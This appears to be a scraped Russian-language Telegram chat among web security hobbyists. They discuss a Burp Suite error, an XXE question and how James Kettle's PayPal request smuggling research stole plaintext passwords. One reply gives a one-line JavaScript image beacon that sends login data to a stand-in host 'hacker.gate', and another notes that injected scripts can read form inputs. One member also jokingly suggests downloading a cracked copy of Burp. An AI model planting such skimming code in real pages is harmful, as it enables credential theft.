Size: a a a

2020 April 20

自閉症のポイント in WebPwnChat
Алекс Ньювейв
Пацаны, сто пудов тут кто-то с макоси бурп юзает…
Меня заебала ошибка received fatal alert: record_overflow при большом POST запросе.
Гуглил решение, на форуме бурпа - проблема якобы решена в 2020.1, а у меня 2020.2.1 и все равно такая дичь...
Большой post запрос это сколько? Никогда такого не ловил
источник

АН

Алекс Ньювейв in WebPwnChat
自閉症のポイント
Большой post запрос это сколько? Никогда такого не ловил
Под 1 мб
источник

自閉症のポイント in WebPwnChat
Хм, грузил запросы с картинками по 5,7 мб, все норм
источник

АН

Алекс Ньювейв in WebPwnChat
Я раньше тоже нормально все грузил…. пока бурп не купил )))) Вот как только купил - начались проблемы с этой ошибкой ))
источник

自閉症のポイント in WebPwnChat
Скачай кряк))
источник

АН

Алекс Ньювейв in WebPwnChat
Ну это шутка (или нет). Но на самом деле, смотрю - люди сталкивались с этой же проблемой, но по заверениям разрабов - все пофиксили в 2020.1..
источник

TB

Thai Bo in WebPwnChat
https://ibb.co/wSSTsq0   Можно тут на xxe надеяться ? (После плюсов ответ)
источник

GD

Green Dog in WebPwnChat
Алекс Ньювейв
Ну это шутка (или нет). Но на самом деле, смотрю - люди сталкивались с этой же проблемой, но по заверениям разрабов - все пофиксили в 2020.1..
Переехать на более строю версию можно
источник

I

Ivan in WebPwnChat
Thai Bo
https://ibb.co/wSSTsq0   Можно тут на xxe надеяться ? (После плюсов ответ)
сперва я не понял, зачем фотать экран, мы что, в Одноклассниках? Ведь есть скриншоты.

А потом  понял —ну а как иначе всем показать, что у тебя АЙФОН
источник

%

%2🦠 in WebPwnChat
Мда) заморочился, проверил
источник

А

Алексей in WebPwnChat
Ivan
сперва я не понял, зачем фотать экран, мы что, в Одноклассниках? Ведь есть скриншоты.

А потом  понял —ну а как иначе всем показать, что у тебя АЙФОН
На рабочей машине может не быть ничего, кроме работы)
источник

TB

Thai Bo in WebPwnChat
Ivan
сперва я не понял, зачем фотать экран, мы что, в Одноклассниках? Ведь есть скриншоты.

А потом  понял —ну а как иначе всем показать, что у тебя АЙФОН
Картинки не могу постить здесь(нет прав)
источник

S

S N in WebPwnChat
по request smuggling - когда James kettle показал свой кейс с paypal - как он смог прочесть логин и пароль пользователей, которые используют safari или IE

он смог "заразить" js файл paypal на свой js файл, которые потом подгружается для юзера

вот после всех действий - он там еще смог обойти csp через iframe он пишет в статье - and steal plaintext PayPal passwords from everyone who logged in using Safari or IE.

и вот никак не могу понять как он смог прочесть в открытом виде логин и пароль
какая может быть угроза, если получилось заразить js файл через cache poisoning и подменить на свой js файл
источник

TB

Thai Bo in WebPwnChat
S N
по request smuggling - когда James kettle показал свой кейс с paypal - как он смог прочесть логин и пароль пользователей, которые используют safari или IE

он смог "заразить" js файл paypal на свой js файл, которые потом подгружается для юзера

вот после всех действий - он там еще смог обойти csp через iframe он пишет в статье - and steal plaintext PayPal passwords from everyone who logged in using Safari or IE.

и вот никак не могу понять как он смог прочесть в открытом виде логин и пароль
какая может быть угроза, если получилось заразить js файл через cache poisoning и подменить на свой js файл
var img = new Image(100, 200); img.src = “http://hacker.gate?logindata”;  ?
источник

ШП

Шиштош Пецка in WebPwnChat
S N
по request smuggling - когда James kettle показал свой кейс с paypal - как он смог прочесть логин и пароль пользователей, которые используют safari или IE

он смог "заразить" js файл paypal на свой js файл, которые потом подгружается для юзера

вот после всех действий - он там еще смог обойти csp через iframe он пишет в статье - and steal plaintext PayPal passwords from everyone who logged in using Safari or IE.

и вот никак не могу понять как он смог прочесть в открытом виде логин и пароль
какая может быть угроза, если получилось заразить js файл через cache poisoning и подменить на свой js файл
Все просто
источник

ШП

Шиштош Пецка in WebPwnChat
Js может получать значение инпутов до их отправки
источник

ШП

Шиштош Пецка in WebPwnChat
Хз почему сафари и ие
источник

ШП

Шиштош Пецка in WebPwnChat
Видимо связанно с цсп
источник

S

S N in WebPwnChat
Шиштош Пецка
Js может получать значение инпутов до их отправки
получается он скопировал полностью js файл paypal залил на свой сервак и изменил его - файлик с сервера james kettle закешировался, и теперь используется его файлик,  или оставил как есть?
источник

ШП

Шиштош Пецка in WebPwnChat
S N
получается он скопировал полностью js файл paypal залил на свой сервак и изменил его - файлик с сервера james kettle закешировался, и теперь используется его файлик,  или оставил как есть?
Дописал свой код скорее всего да, чтобы не отвалилось ничего
источник